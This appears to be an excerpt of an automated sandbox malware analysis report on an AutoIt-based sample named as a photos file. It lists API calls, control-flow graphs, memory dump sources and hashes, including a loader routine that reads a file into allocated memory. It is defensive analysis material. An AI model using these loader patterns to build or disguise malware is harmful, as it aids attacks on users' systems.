                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      • Opcode ID: 4ae7e845ac036e44f3fe6bc4979bb518c26a9fb45f80273d3d5454fb06b559d2
                                                                      • Instruction ID: 1df9fbfc88c6c0b4b4ee5f8be1ec2e0e680ff120b300fb933ad1c3db7c222b2a
                                                                      • Opcode Fuzzy Hash: 4ae7e845ac036e44f3fe6bc4979bb518c26a9fb45f80273d3d5454fb06b559d2
                                                                      • Instruction Fuzzy Hash: 27115A71200701BFD7218B65EC48F67BBBAEBC6B51F24456CB506DA350EF71D8808A31
                                                                      APIs
                                                                      • GetInputState.USER32 ref: 00D1F107
                                                                      • timeGetTime.WINMM ref: 00D1F307
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D1F428
                                                                      • TranslateMessage.USER32(?), ref: 00D1F47B
                                                                      • DispatchMessageW.USER32(?), ref: 00D1F489
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D1F49F
                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00D1F4B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                      • String ID:
                                                                      • API String ID: 2189390790-0
                                                                      • Opcode ID: 467638977e9e5ea664d4728c406c47166b0dfcd325710044a331fc38d18c0027
                                                                      • Instruction ID: a04b2c6e21405fbf8ede062df60cfcc0ae4ef2adb34e042d37be202d541dc18c
                                                                      • Opcode Fuzzy Hash: 467638977e9e5ea664d4728c406c47166b0dfcd325710044a331fc38d18c0027
                                                                      • Instruction Fuzzy Hash: 0E32C170608741EFD724DF24E884BAAB7E5FF85314F184529E4A58B391DB70E984CBB2

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00D158E5: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,PO,?,00D148AA,?,?,?,00000000), ref: 00D15903
                                                                        • Part of subcall function 00D14D82: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D14DA4
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D1545B
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D53EEC
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D53F2D
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00D53F6F
                                                                      • _wcslen.LIBCMT ref: 00D53FD6
                                                                      • _wcslen.LIBCMT ref: 00D53FE5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Pj$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 98802146-1879079677
                                                                      • Opcode ID: 6b22a4f8355d2988cf0da4fae85f06cba3c0ee62c5a16b984dbb3e379a54ee76
                                                                      • Instruction ID: 528cae942984539cedde07a27410272be059f620ddba45f5cb2da4c022332cf5
                                                                      • Opcode Fuzzy Hash: 6b22a4f8355d2988cf0da4fae85f06cba3c0ee62c5a16b984dbb3e379a54ee76
                                                                      • Instruction Fuzzy Hash: 6B714F71508341AEC714EF69EC819AABBE8FF55350F40082EF945D72A0EB749989CF72

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00D14732
                                                                      • RegisterClassExW.USER32(00000030), ref: 00D1475C
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D1476D
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00D1478A
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D1479A
                                                                      • LoadIconW.USER32(000000A9), ref: 00D147B0
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D147BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 4bfd69fbe1cdd5ef9cb5416f9cae637d9e17ab0100d18a597a886fb679bd5f77
                                                                      • Instruction ID: 26eff64067a18a0f7638520661089dec15c3302338cb6aa6b06735f1b0ca53ef
                                                                      • Opcode Fuzzy Hash: 4bfd69fbe1cdd5ef9cb5416f9cae637d9e17ab0100d18a597a886fb679bd5f77
                                                                      • Instruction Fuzzy Hash: 2C21E3B9A11358AFDB00EFA4EC89BDDBBB4FB09710F10911AF511EA3A0D7B445448FA5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 438 d505fc-d5062c call d503d0 441 d50647-d50653 call d451b1 438->441 442 d5062e-d50639 call d3f256 438->442 448 d50655-d5066a call d3f256 call d3f269 441->448 449 d5066c-d506b5 call d5033b 441->449 447 d5063b-d50642 call d3f269 442->447 459 d5091e-d50924 447->459 448->447 457 d506b7-d506c0 449->457 458 d50722-d5072b GetFileType 449->458 461 d506f7-d5071d GetLastError call d3f233 457->461 462 d506c2-d506c6 457->462 463 d50774-d50777 458->463 464 d5072d-d5075e GetLastError call d3f233 CloseHandle 458->464 461->447 462->461 468 d506c8-d506f5 call d5033b 462->468 466 d50780-d50786 463->466 467 d50779-d5077e 463->467 464->447 475 d50764-d5076f call d3f269 464->475 471 d5078a-d507d8 call d450fa 466->471 472 d50788 466->472 467->471 468->458 468->461 481 d507e8-d5080c call d500ee 471->481 482 d507da-d507e6 call d5054c 471->482 472->471 475->447 487 d5081f-d50862 481->487 488 d5080e 481->488 482->481 489 d50810-d5081a call d4864e 482->489 491 d50864-d50868 487->491 492 d50883-d50891 487->492 488->489 489->459 491->492 494 d5086a-d5087e 491->494 495 d50897-d5089b 492->495 496 d5091c 492->496 494->492 495->496 497 d5089d-d508d0 CloseHandle call d5033b 495->497 496->459 500 d50904-d50918 497->500 501 d508d2-d508fe GetLastError call d3f233 call d452c3 497->501 500->496 501->500
                                                                      APIs
                                                                        • Part of subcall function 00D5033B: CreateFileW.KERNELBASE(00000000,00000000,?,00D506A5,?,?,00000000,?,00D506A5,00000000,0000000C), ref: 00D50358
                                                                      • GetLastError.KERNEL32 ref: 00D50710
                                                                      • __dosmaperr.LIBCMT ref: 00D50717
                                                                      • GetFileType.KERNELBASE(00000000), ref: 00D50723
                                                                      • GetLastError.KERNEL32 ref: 00D5072D
                                                                      • __dosmaperr.LIBCMT ref: 00D50736
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D50756
                                                                      • CloseHandle.KERNEL32(?), ref: 00D508A0
                                                                      • GetLastError.KERNEL32 ref: 00D508D2
                                                                      • __dosmaperr.LIBCMT ref: 00D508D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: 00315015025b78afee56fa5e9d256b189a484dd1abb4c1b4edae025d10ff3068
                                                                      • Instruction ID: d25906f74df16667a01f757479dd29002bf7b64019321d96476c0d33af2755ea
                                                                      • Opcode Fuzzy Hash: 00315015025b78afee56fa5e9d256b189a484dd1abb4c1b4edae025d10ff3068
                                                                      • Instruction Fuzzy Hash: 70A10536A142488FDF19AF68D891BAE7FA0EF0A321F180159FC11DB391C6719916CBB1

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00D145B9
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00D145C8
                                                                      • LoadIconW.USER32(00000063), ref: 00D145DE
                                                                      • LoadIconW.USER32(000000A4), ref: 00D145F0
                                                                      • LoadIconW.USER32(000000A2), ref: 00D14602
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D1461A
                                                                      • RegisterClassExW.USER32(?), ref: 00D1466B
                                                                        • Part of subcall function 00D146FF: GetSysColorBrush.USER32(0000000F), ref: 00D14732
                                                                        • Part of subcall function 00D146FF: RegisterClassExW.USER32(00000030), ref: 00D1475C
                                                                        • Part of subcall function 00D146FF: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D1476D
                                                                        • Part of subcall function 00D146FF: InitCommonControlsEx.COMCTL32(?), ref: 00D1478A
                                                                        • Part of subcall function 00D146FF: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D1479A
                                                                        • Part of subcall function 00D146FF: LoadIconW.USER32(000000A9), ref: 00D147B0
                                                                        • Part of subcall function 00D146FF: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D147BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: 2c87f3855e121a58a32f1d6d5d83d0d5b5f3f63c5c3c7d2cae1378508e15080d
                                                                      • Instruction ID: 125043bf3f09f7f4b871da8f7c15444608a54e59e310657767e6849744ff119c
                                                                      • Opcode Fuzzy Hash: 2c87f3855e121a58a32f1d6d5d83d0d5b5f3f63c5c3c7d2cae1378508e15080d
                                                                      • Instruction Fuzzy Hash: B721E878E11358ABDB10AFA5EC99AAE7FB5FB48B50F10401AF500EA7A0D7B555408FA0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 509 d14b9b-d14bb0 510 d14c10-d14c12 509->510 511 d14bb2-d14bb5 509->511 510->511 514 d14c14 510->514 512 d14bb7-d14bbe 511->512 513 d14c16 511->513 515 d14c90-d14c98 PostQuitMessage 512->515 516 d14bc4-d14bc9 512->516 518 d539dd-d53a05 call d131ed call d2e48c 513->518 519 d14c1c-d14c21 513->519 517 d14bfb-d14c03 DefWindowProcW 514->517 524 d14c44-d14c46 515->524 521 d53a5e-d53a72 call d7be4e 516->521 522 d14bcf-d14bd3 516->522 523 d14c09-d14c0f 517->523 554 d53a0a-d53a11 518->554 525 d14c23-d14c26 519->525 526 d14c48-d14c6f SetTimer RegisterWindowMessageW 519->526 521->524 548 d53a78 521->548 530 d14bd9-d14bde 522->530 531 d53a4a-d53a59 call d7c07f 522->531 524->523 527 d5397e-d53981 525->527 528 d14c2c-d14c3f KillTimer call d14b1d call d15adb 525->528 526->524 532 d14c71-d14c7c CreatePopupMenu 526->532 540 d53983-d53987 527->540 541 d539b9-d539d8 MoveWindow 527->541 528->524 537 d14be4-d14be9 530->537 538 d53a2f-d53a36 530->538 531->524 532->524 546 d14bef-d14bf5 537->546 547 d14c7e-d14c8e call d14c9a 537->547 538->517 542 d53a3c-d53a45 call d70a1b 538->542 549 d53989-d5398c 540->549 550 d539a8-d539b4 SetFocus 540->550 541->524 542->517 546->517 546->554 547->524 548->517 549->546 555 d53992-d539a3 call d131ed 549->555 550->524 554->517 558 d53a17-d53a2a call d14b1d call d156c2 554->558 555->524 558->517
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D14B95,?,?), ref: 00D14C03
                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00D14B95,?,?), ref: 00D14C2F
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D14C52
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D14B95,?,?), ref: 00D14C5D
                                                                      • CreatePopupMenu.USER32 ref: 00D14C71
                                                                      • PostQuitMessage.USER32(00000000), ref: 00D14C92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: 3d7b3aa7439e9e06ddd3c990b21180d2f445e0d403af659f8f0ff9e442fbf315
                                                                      • Instruction ID: cc9f8d5c959bc25e4b5a1023e1754f331cb8c734394fd58647964adc5c08168b
                                                                      • Opcode Fuzzy Hash: 3d7b3aa7439e9e06ddd3c990b21180d2f445e0d403af659f8f0ff9e442fbf315
                                                                      • Instruction Fuzzy Hash: 4D41F575318244BBDF186F68BE49BF93A1AEB01351F084125F956CA3A2CE71CDC08BB1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 565 1236e70-1236f1e call 1234870 568 1236f25-1236f4b call 1237d80 CreateFileW 565->568 571 1236f52-1236f62 568->571 572 1236f4d 568->572 577 1236f64 571->577 578 1236f69-1236f83 VirtualAlloc 571->578 573 123709d-12370a1 572->573 575 12370e3-12370e6 573->575 576 12370a3-12370a7 573->576 579 12370e9-12370f0 575->579 580 12370b3-12370b7 576->580 581 12370a9-12370ac 576->581 577->573 584 1236f85 578->584 585 1236f8a-1236fa1 ReadFile 578->585 586 12370f2-12370fd 579->586 587 1237145-123715a 579->587 582 12370c7-12370cb 580->582 583 12370b9-12370c3 580->583 581->580 590 12370db 582->590 591 12370cd-12370d7 582->591 583->582 584->573 592 1236fa3 585->592 593 1236fa8-1236fe8 VirtualAlloc 585->593 594 1237101-123710d 586->594 595 12370ff 586->595 588 123716a-1237172 587->588 589 123715c-1237167 VirtualFree 587->589 589->588 590->575 591->590 592->573 596 1236fea 593->596 597 1236fef-123700a call 1237fd0 593->597 598 1237121-123712d 594->598 599 123710f-123711f 594->599 595->587 596->573 605 1237015-123701f 597->605 600 123713a-1237140 598->600 601 123712f-1237138 598->601 603 1237143 599->603 600->603 601->603 603->579 606 1237052-1237066 call 1237de0 605->606 607 1237021-1237050 call 1237fd0 605->607 613 123706a-123706e 606->613 614 1237068 606->614 607->605 615 1237070-1237074 CloseHandle 613->615 616 123707a-123707e 613->616 614->573 615->616 617 1237080-123708b VirtualFree 616->617 618 123708e-1237097 616->618 617->618 618->568 618->573
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01236F41
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01237167
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696671381.0000000001234000.00000040.00000020.00020000.00000000.sdmp, Offset: 01234000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1234000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                      • Instruction ID: 279d99d55b0f516f5b28704f944f8c263d4d4c8f8f6a1e75529df24e27b1b84a
                                                                      • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                      • Instruction Fuzzy Hash: 46A1F7B4E10209EBDF14CFA4C895BEEBBB5BF88304F208159E615BB280D7759A41CF54

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 629 d1468e-d146fe CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D146BC
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D146DD
                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D136D8,?), ref: 00D146F1
                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D136D8,?), ref: 00D146FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: eaa9ef2cc334498b3bffe87a9f459b3d9633664e18b768362f6b45da632fa0ea
                                                                      • Instruction ID: 3ea583675563d7084c9bc6e4fd6577ab2b256bdac090126f39a9bac76f2d0b52
                                                                      • Opcode Fuzzy Hash: eaa9ef2cc334498b3bffe87a9f459b3d9633664e18b768362f6b45da632fa0ea
                                                                      • Instruction Fuzzy Hash: F1F0DA796503D07AEB3127576C88E777EBDD7CBF60B00105AF904EA7A0C6711850DAB0

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00D134CE: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D134FF
                                                                        • Part of subcall function 00D134CE: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D13507
                                                                        • Part of subcall function 00D134CE: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D13512
                                                                        • Part of subcall function 00D134CE: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D1351D
                                                                        • Part of subcall function 00D134CE: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D13525
                                                                        • Part of subcall function 00D134CE: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D1352D
                                                                        • Part of subcall function 00D13455: RegisterWindowMessageW.USER32(00000004,?,00D12BCF), ref: 00D134AD
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D12C75
                                                                      • OleInitialize.OLE32 ref: 00D12C93
                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00D53037
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: ($h
                                                                      • API String ID: 1986988660-4200064251
                                                                      • Opcode ID: 83a4613a41ae4058709bf5bd6465db2c4031decc2848aebb30caca7b76538792
                                                                      • Instruction ID: 6cf4d17a81e26b52a884cefe787a89e8b92e0c6b53433048a0ff0dc849e1c629
                                                                      • Opcode Fuzzy Hash: 83a4613a41ae4058709bf5bd6465db2c4031decc2848aebb30caca7b76538792
                                                                      • Instruction Fuzzy Hash: 13717EBCB113819EC784FF7AA9C56993AF1FB89354784922AD01ACB361EB304485CF75

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 787 1236c20-1236d6a call 1234870 call 1236b10 CreateFileW 794 1236d71-1236d81 787->794 795 1236d6c 787->795 798 1236d83 794->798 799 1236d88-1236da2 VirtualAlloc 794->799 796 1236e21-1236e26 795->796 798->796 800 1236da6-1236dbd ReadFile 799->800 801 1236da4 799->801 802 1236dc1-1236dfb call 1236b50 call 1235b10 800->802 803 1236dbf 800->803 801->796 808 1236e17-1236e1f ExitProcess 802->808 809 1236dfd-1236e12 call 1236ba0 802->809 803->796 808->796 809->808
                                                                      APIs
                                                                        • Part of subcall function 01236B10: Sleep.KERNELBASE(000001F4), ref: 01236B21
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01236D60
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696671381.0000000001234000.00000040.00000020.00020000.00000000.sdmp, Offset: 01234000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1234000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: ZLKQ2RNOA95R366HP
                                                                      • API String ID: 2694422964-1660151535
                                                                      • Opcode ID: a48f59775b04fbc4842a7e31da12e3c2c1e762cd13144e057c4ac5d4e58bae3e
                                                                      • Instruction ID: 66ff565871c8a5407008de3d792402acc01eddc70bb1672700d71212e5f61776
                                                                      • Opcode Fuzzy Hash: a48f59775b04fbc4842a7e31da12e3c2c1e762cd13144e057c4ac5d4e58bae3e
                                                                      • Instruction Fuzzy Hash: 44519370D24248EBEF15DBE4C854BEEBB79AF58300F004599E208BB2C1D7B95B45CB65

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 811 d159a7-d159b2 812 d15a24-d15a26 811->812 813 d159b4-d159b9 811->813 814 d15a17-d15a1a 812->814 813->812 815 d159bb-d159d3 RegOpenKeyExW 813->815 815->812 816 d159d5-d159f4 RegQueryValueExW 815->816 817 d159f6-d15a01 816->817 818 d15a0b-d15a16 RegCloseKey 816->818 819 d15a03-d15a05 817->819 820 d15a1b-d15a22 817->820 818->814 821 d15a09 819->821 820->821 821->818
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D1599A,SwapMouseButtons,00000004,?), ref: 00D159CB
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D1599A,SwapMouseButtons,00000004,?), ref: 00D159EC
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D1599A,SwapMouseButtons,00000004,?), ref: 00D15A0E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: 73e77ea34d4005f2d9beaf523180b7ed0bfe5f1e1ae026b162c9b98dd44936dc
                                                                      • Instruction ID: 0ff4fc37ec329d7cc1f427426a546453361abb0c02ff6ae6d9cc8fc2502c3c6e
                                                                      • Opcode Fuzzy Hash: 73e77ea34d4005f2d9beaf523180b7ed0bfe5f1e1ae026b162c9b98dd44936dc
                                                                      • Instruction Fuzzy Hash: 9E115A71560608FFDB208FA4EC85AEFBBB8EF41740B109619E801E7214E631AE809B70

